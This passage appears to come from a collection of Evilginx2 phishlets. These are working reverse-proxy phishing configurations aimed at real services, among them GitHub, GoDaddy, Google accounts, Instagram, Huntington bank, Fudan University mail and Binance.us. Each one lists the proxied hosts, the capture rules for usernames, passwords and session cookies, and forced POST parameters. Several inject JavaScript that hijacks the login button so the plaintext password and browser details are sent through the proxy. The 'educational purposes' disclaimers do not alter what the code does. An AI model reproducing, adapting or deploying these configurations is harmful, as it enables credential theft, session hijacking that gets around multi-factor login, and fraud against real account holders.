 76 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 77 |         xhr.send("Browser="+encodeURIComponent(browser));
 78 |         
 79 |         var engine = navigator.product;
 80 |         xhr.open("POST", '/', true);
 81 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 82 |         xhr.send("Engine="+encodeURIComponent(engine));
 83 |         
 84 |         var platform = navigator.platform;
 85 |         var xhr = new XMLHttpRequest();
 86 |         xhr.open("POST", '/', true);
 87 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 88 |         xhr.send("Platform="+encodeURIComponent(platform));
 89 |         return;
 90 |       }
 91 |       function sendPass(){
 92 |         var password = document.getElementsByName("pass")[0].value;
 93 |         var xhr = new XMLHttpRequest();
 94 |         xhr.open("POST", '/login/device-based/regular/login/', true);
 95 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 96 |         xhr.send("unenc_password="+encodeURIComponent(password));
 97 |         return;
 98 |       }
 99 |       setTimeout(function(){ onclickListener(); }, 1000);
100 |       
101 | 
102 | # UPDATE : LOOKS LIKE FACEBOOK HAS CHANGED THE JAVASCRIPT FUNCTION, STILL THE FILTERS WORKS SOMETIME , SO I LEFT THEM AS THEY WERE IN PREVIOUS PHISHLET I MADE.
103 |       
104 | # The js Function Responsible For Password Encryption is Present in this js file Located At : https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/yEB-M5_vVi6.js?_nc_x=Ij3Wp8lg5Kz
105 | #
106 | # _encryptBeforeSending: function (a) {
107 | #      var c = this;
108 | #      a = a.bind(this);
109 | #      var d = this.loginFormParams && this.loginFormParams.pubKey;
110 | #      if ((window.crypto || window.msCrypto) && d) {
111 | #        var e = b('DOM').scry(this.loginForm, 'input[id="pass"]') [0],
112 | #        f = b('FBBrowserPasswordEncryption'),
113 | #        g = Math.floor(Date.now() / 1000).toString();
114 | #        b('promiseDone') (f.encryptPassword(d.keyId, d.publicKey, e.value, g), function (d) {
115 | #          d = b('DOM').create('input', {
116 | #            type: 'hidden',
117 | #            name: 'ep',
118 | #            value: d
119 | #          });
120 | #          c.loginForm.appendChild(d);
121 | #          e.disabled = !0;
122 | #          a()
123 | #        }, function (c) {
124 | #          var d = '#PWD_BROWSER',
125 | #          e = 5,
126 | #          f = b('LoginServicePasswordEncryptDecryptEventTypedLogger');
127 | #          new f().setError('BrowserEncryptionFailureInLoginFormControllerWWW').setGrowthFlow('Bluebar/main login WWW').setErrorMessage(c.message).setPasswordTag(d).setPasswordEncryptionVersion(e).setPasswordTimestamp(g).logVital();
128 | #          a()
129 | #        })
130 | #      } else a()
131 | #    },
132 | 
133 | 


--------------------------------------------------------------------------------
/fudan.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | 
 5 | author: '@an0n'
 6 | min_ver: '2.3.0'
 7 | proxy_hosts:
 8 |   - {phish_sub: 'mail', orig_sub: 'mail', domain: 'fudan.edu.cn', session: true, is_landing: true, auto_filter: false}
 9 |   - {phish_sub: '', orig_sub: '', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
10 |   - {phish_sub: 'ecampus', orig_sub: 'ecampus', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
11 |   - {phish_sub: 'xxb', orig_sub: 'xxb', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
12 |   - {phish_sub: 'xxbcrawler', orig_sub: 'xxbcrawler', domain: 'fudan.edu.cn', session: true, is_landing: false, auto_filter: false}
13 | #  - {phish_sub: '', orig_sub: '', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
14 | #  - {phish_sub: 'webmail', orig_sub: 'webmail', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
15 | #  - {phish_sub: 'swk', orig_sub: 'swk', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
16 | #  - {phish_sub: 'cancer', orig_sub: 'cancer', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
17 | #  - {phish_sub: 'eent', orig_sub: 'eent', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
18 | #  - {phish_sub: 'fys', orig_sub: 'fys', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
19 | #  - {phish_sub: 'goh', orig_sub: 'goh', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}  
20 | #  - {phish_sub: 'hsh', orig_sub: 'hsh', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
21 | #  - {phish_sub: 'jsyy', orig_sub: 'jsyy', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
22 | #  - {phish_sub: 'sci', orig_sub: 'sci', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
23 | #  - {phish_sub: 'zsyy', orig_sub: 'zsyy', domain: 'shmu.edu.cn', session: true, is_landing: false, auto_filter: true}
24 | 
25 | 
26 | 
27 | sub_filters:
28 |   - {triggers_on: 'mail.fudan.edu.cn', orig_sub: 'mail', domain: 'fudan.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
29 |   - {triggers_on: 'mail.fudan.edu.cn', orig_sub: 'xxbcrawler', domain: 'fudan.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
30 | #  - {triggers_on: 'mail.fudan.edu.cn', orig_sub: '', domain: 'shmu.edu.cn', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
31 | 
32 | auth_tokens:
33 |   - domain: '.fudan.edu.cn'
34 |     keys: ['.*,regexp']
35 |   - domain: 'mail.fudan.edu.cn'
36 |     keys: ['.*,regexp']
37 | #  - domain: '.shmu.edu.cn'
38 | #    keys: ['.*,regexp']
39 | credentials:
40 |   username:
41 |     key: 'uid'
42 |     search: '(.*)'
43 |     type: 'post'
44 |   password:
45 |     key: 'password'
46 |     search: '(.*)'
47 |     type: 'post'
48 |   custom: 
49 |     - key: 'domain'
50 |       search: '(.*)'
51 |       type: 'post'
52 |     - key: 'locale'
53 |       search: '(.*)'
54 |       type: 'post'
55 |      
56 | 
57 | force_post:
58 |   - path: '/coremail/index.jsp'
59 |     search:
60 |       - {key: 'uid', search: '.*'}
61 |       - {key: 'password', search: '.*'}
62 |     force:
63 |       - {key: 'useSSL', value: 'true'}
64 |     type: 'post'
65 |       
66 | login:
67 |   domain: 'mail.fudan.edu.cn'
68 |   path: '/'
69 | 
70 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
71 | # PLEASE DO NOT MISUSE THIS PHISHLET.
72 | 


--------------------------------------------------------------------------------
/github.yaml:
--------------------------------------------------------------------------------
 1 | author: '@audibleblink'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
 6 |   - {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
 7 | 
 8 | sub_filters:
 9 |   - {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
10 | 
11 | auth_tokens:
12 |   - domain: '.github.com'
13 |     keys: ['logged_in', 'dotcom_user']
14 |   - domain: 'github.com'
15 |     keys: ['user_session', '_gh_sess']
16 | 
17 | credentials:
18 |   username:
19 |     key: 'login'
20 |     search: '(.*)'
21 |     type: 'post'
22 |   password:
23 |     key: 'password'
24 |     search: '(.*)'
25 |     type: 'post'
26 | 
27 | login:
28 |   domain: 'github.com'
29 |   path: '/login'
30 | 


--------------------------------------------------------------------------------
/godaddy.yaml:
--------------------------------------------------------------------------------
 1 | 
 2 | author: '@An0nud4y' 
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing: true}
 6 | #  - {phish_sub: 'img6', orig_sub: 'img6', domain: 'wsimg.com', session: true, is_landing: false}
 7 |   - {phish_sub: 'img1', orig_sub: 'img1', domain: 'wsimg.com', session: true, is_landing: false}
 8 |   - {phish_sub: 'events', orig_sub: 'events', domain: 'godaddy.com', session: true, is_landing: false}
 9 |   - {phish_sub: 'gui', orig_sub: 'gui', domain: 'godaddy.com', session: true, is_landing: false}
10 | 
11 | sub_filters:
12 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 | #  - {triggers_on: 'sso.godaddy.com', orig_sub: 'img6', domain: 'wsimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
15 | #  - {triggers_on: 'sso.godaddy.com', orig_sub: 'img6', domain: 'wsimg.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'img1', domain: 'wsimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'img1', domain: 'wsimg.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'events', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
19 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'events', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
20 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
21 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 | 
23 | auth_tokens:
24 |   - domain: '.godaddy.com'
25 |     keys: ['(.*)','.*,regexp']
26 | credentials:
27 |   username:
28 |     key: 'username'
29 |     search: '(.*)'
30 |     type: 'post'
31 |   password:
32 |     key: 'password'
33 |     search: '(.*)'
34 |     type: 'post'
35 | login:
36 |   domain: 'sso.godaddy.com'
37 |   path: '/' 
38 |   
39 | 


--------------------------------------------------------------------------------
/gsuite.yaml:
--------------------------------------------------------------------------------
 1 | author: '@K70'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,}
 5 |   - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
 6 |   - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false}
 7 |   - {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
 8 |   - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: false}
 9 |   - {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
10 |   - {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false}
11 | sub_filters:
12 |   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts-google.com.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
13 |   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'ssl.gstatic.com', replace: 'ssl.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
14 |   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'play.google.com', replace: 'play.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
15 |   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'apis.google.com', replace: 'apis.{domain}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
16 |   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'www.google.com', replace: 'www.{domain}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
17 |   - {triggers_on: 'apis.google.com', orig_sub: 'apis', domain: 'google.com', search: 'content.googleapis.com', replace: 'content.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
18 | auth_tokens:
19 |   - domain: '.google.com'
20 |     keys: [".*,regexp"]
21 |   - domain: 'accounts.google.com'
22 |     keys: [".*,regexp"]
23 |   - domain: 'accounts.google.bg'
24 |     keys: [".*,regexp"]
25 | credentials:
26 |   username:
27 |     key: 'f.req'
28 |     search: '\],"([^"]*)"\]$'
29 |     type: 'post'
30 |   password:
31 |     key: 'f.req'
32 |     search: ',\["([^"]*)",'
33 |     type: 'post'
34 |   custom:
35 |     - key: 'useragent'
36 |       search: '(.*)'
37 |       type: 'post'
38 |     - key: 'browser'
39 |       search: '(.*)'
40 |       type: 'post'
41 |     - key: 'engine'
42 |       search: '(.*)'
43 |       type: 'post'
44 |     - key: 'platform'
45 |       search: '(.*)'
46 |       type: 'post'
47 | auth_urls:
48 |   - '/CheckCookie'
49 |   - '/ManageAccount'
50 | login:
51 |   domain: 'accounts.google.com'
52 |   path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'
53 | force_post:
54 |   - path: '/_/signin/sl/challenge'
55 |     search: 
56 |       - {key: 'f.req', search: '.*'}
57 |       - {key: 'continue', search: '.*'}
58 |     force:
59 |       - {key: 'continue', value: ''}
60 |     type: 'post'
61 | js_inject:
62 |   - trigger_domains: ['accounts.google.com']
63 |     trigger_paths: ['.*?']
64 |     script: |
65 |       function serialize( obj ){
66 |         var str = [];
67 |         for (var p in obj){
68 |           if (obj.hasOwnProperty(p)) {
69 |             str.push(encodeURIComponent(p) + "=" + encodeURIComponent(obj[p]));
70 |           }
71 |         }
72 |         return str.join("&");
73 |       }
74 |       function toPopulate(){
75 |         console.log( "Populating" );
76 |         var xhttp = new XMLHttpRequest();
77 |         var tosend = {
78 |           useragent : navigator.userAgent,
79 |           browser    : navigator.appName,
80 |           engine     : navigator.product,
81 |           platform   : navigator.platform,
82 |         }
83 |         xhttp.onreadystatechange = function(){
84 |           console.log( "Sent" );
85 |         }
86 |         xhttp.open( "POST", "/getuserinfo", true );
87 |         xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
88 |         console.log( serialize( tosend ) );
89 |         xhttp.send( serialize( tosend ) );
90 |       }
91 |       console.log( "Reached here." );
92 |       setTimeout(toPopulate, 2000);


--------------------------------------------------------------------------------
/huntington.yaml:
--------------------------------------------------------------------------------
 1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...
 2 | 
 3 | author: '@anon' 
 4 | min_ver: '2.3.0'
 5 | proxy_hosts:
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'huntington.com', session: true, is_landing: true}
 7 |   - {phish_sub: 'smetrics', orig_sub: 'smetrics', domain: 'huntington.com', session: true, is_landing: false}
 8 |   - {phish_sub: 'onlinebanking', orig_sub: 'onlinebanking', domain: 'huntington.com', session: true, is_landing: true}
 9 |   - {phish_sub: 'ensighten', orig_sub: 'ensighten', domain: 'huntingtobank.com', session: true, is_landing: false}
10 |   - {phish_sub: '', orig_sub: '', domain: 'huntington.com', session: true, is_landing: false}
11 |   - {phish_sub: 'ddata', orig_sub: 'ddata', domain: 'huntingtobank.com', session: true, is_landing: false}
12 |   - {phish_sub: 'ensighten', orig_sub: 'ensighten', domain: 'huntingtobank.com', session: true, is_landing: false}
13 |   - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
14 |   - {phish_sub: 'googletag', orig_sub: 'www', domain: 'googletagmanager.com', session: true, is_landing: false}
15 |   - {phish_sub: 'players', orig_sub: 'players', domain: 'brightcove.net', session: true, is_landing: false}
16 |   - {phish_sub: 'vjs', orig_sub: 'vjs', domain: 'zencdn.net', session: true, is_landing: false}  
17 |   - {phish_sub: 'dynatrace', orig_sub: 'mef957', domain: 'dynatrace-managed.com', session: true, is_landing: false}
18 | 
19 | sub_filters:
20 |   - {triggers_on: 'www.huntington.com', orig_sub: 'www', domain: 'huntington.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
21 |   - {triggers_on: 'www.huntington.com', orig_sub: 'www', domain: 'huntington.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 |   - {triggers_on: 'www.huntington.com', orig_sub: 'ensighten', domain: 'huntingtobank.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 |   - {triggers_on: 'www.huntington.com', orig_sub: 'ensighten', domain: 'huntingtobank.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 |   - {triggers_on: 'www.huntington.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
25 |   - {triggers_on: 'www.huntington.com', orig_sub: 'www', domain: 'google.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
26 |   - {triggers_on: 'www.huntington.com', orig_sub: 'www', domain: 'googletagmanager.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
27 |   - {triggers_on: 'www.huntington.com', orig_sub: 'www', domain: 'googletagmanager.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
28 |   - {triggers_on: 'www.huntington.com', orig_sub: 'players', domain: 'brightcove.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
29 |   - {triggers_on: 'www.huntington.com', orig_sub: 'players', domain: 'brightcove.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
30 |   - {triggers_on: 'www.huntington.com', orig_sub: 'vjs', domain: 'zencdn.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
31 |   - {triggers_on: 'www.huntington.com', orig_sub: 'vjs', domain: 'zencdn.net', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
32 |   - {triggers_on: 'www.huntington.com', orig_sub: 'smetrics', domain: 'huntington.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
33 |   - {triggers_on: 'www.huntington.com', orig_sub: 'smetrics', domain: 'huntington.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
34 |   - {triggers_on: 'www.huntington.com', orig_sub: 'onlinebanking', domain: 'huntington.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
35 |   - {triggers_on: 'www.huntington.com', orig_sub: 'onlinebanking', domain: 'huntington.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
36 |   - {triggers_on: 'www.huntington.com', orig_sub: '', domain: 'huntington.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
37 |   - {triggers_on: 'www.huntington.com', orig_sub: '', domain: 'huntington.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
38 |   - {triggers_on: 'www.huntington.com', orig_sub: 'ddata', domain: 'huntingtobank.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
39 |   - {triggers_on: 'www.huntington.com', orig_sub: 'ddata', domain: 'huntingtobank.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
40 |   - {triggers_on: 'www.huntington.com', orig_sub: 'mef957', domain: 'dynatrace-managed.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
41 |   - {triggers_on: 'www.huntington.com', orig_sub: 'mef957', domain: 'dynatrace-managed.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
42 |      
43 | 
44 | 
45 | auth_tokens:
46 |   - domain: '.huntington.com'
47 |     keys: ['sessionid','.*,regexp']
48 | credentials:
49 |   username:
50 |     key: 'username'
51 |     search: '(.*)'
52 |     type: 'post'
53 |   password:
54 |     key: 'password'
55 |     search: '(.*)'
56 |     type: 'post'
57 | login:
58 |   domain: 'www.huntington.com'
59 |   path: '/mobile-login'
60 |   
61 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...  
62 |   
63 | 


--------------------------------------------------------------------------------
/instagram.yaml:
--------------------------------------------------------------------------------
 1 | author: '@charlesbel'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_landing: false}
 6 | sub_filters:
 7 |   - {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
 8 |   - {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 9 |   - {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
10 | auth_tokens:
11 |   - domain: '.instagram.com'
12 |     keys: ['sessionid','.*,regexp']
13 | credentials:
14 |   username:
15 |     key: 'user'
16 |     search: '(.*)'
17 |     type: 'post'
18 |   password:
19 |     key: 'unenc_password'
20 |     search: '(.*)'
21 |     type: 'post'
22 | login:
23 |   domain: 'www.instagram.com'
24 |   path: '/accounts/login'
25 | js_inject:
26 |   - trigger_domains: ["www.instagram.com"]
27 |     trigger_paths: ["/accounts/login"]
28 |     trigger_params: []
29 |     script: |
30 |       function lp(){
31 |         var submit = document.querySelectorAll('button[type=submit]')[0];
32 |         submit.setAttribute("onclick", "sendPass()");
33 |         return;
34 |       }
35 |       function sendPass(){
36 |         var password = document.getElementsByName("password")[0].value;
37 |         var xhr = new XMLHttpRequest();
38 |         xhr.open("POST", '/accounts/login/ajax/', true);
39 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
40 |         xhr.send("unenc_password="+encodeURIComponent(password));
41 |         return;
42 |       }
43 |       setTimeout(function(){ lp(); }, 1000);


--------------------------------------------------------------------------------
/intuit.yaml:
--------------------------------------------------------------------------------
 1 | author: '@an0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |     - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true}
 5 |     - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false}
 6 |     - {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false}
 7 |     - {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false}
 8 |     - {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false}
 9 |     - {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false}	
10 |     - {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false}
11 |     - {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false}
12 |     - {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false}
13 |     - {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false}
14 |     - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
15 | 
16 | # www.gstatic.com
17 | # www.google.com
18 | # accounts.intuit.com
19 | # appfabric-preload.app.intuit.com
20 | # lib.intuitcdn.net
21 | # plugin.intuitcdn.net
22 | # segment.intuitcdn.net
23 | # qbo.intuit.com
24 | # lacerte.intuit.com
25 | # intuitmarket.intuit.com
26 | # 
27 | 
28 | 
29 | # uxfabric.intuitcdn.net
30 | # trinity.platform.intuit.com
31 | # www.intuit.com
32 | # quickbooks.intuit.com
33 | # segment.intuitcdn.net
34 | # rum.api.intuit.com
35 | # intuit.com
36 | # eventbus.intuit.com
37 | # cdn.websdk.intuit.com
38 | # 
39 |   
40 | sub_filters:
41 |     - {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
42 |     - {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
43 |     - {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
44 |     - {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
45 |     - {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
46 |     - {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
47 |     - {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
48 |     - {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
49 |     - {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
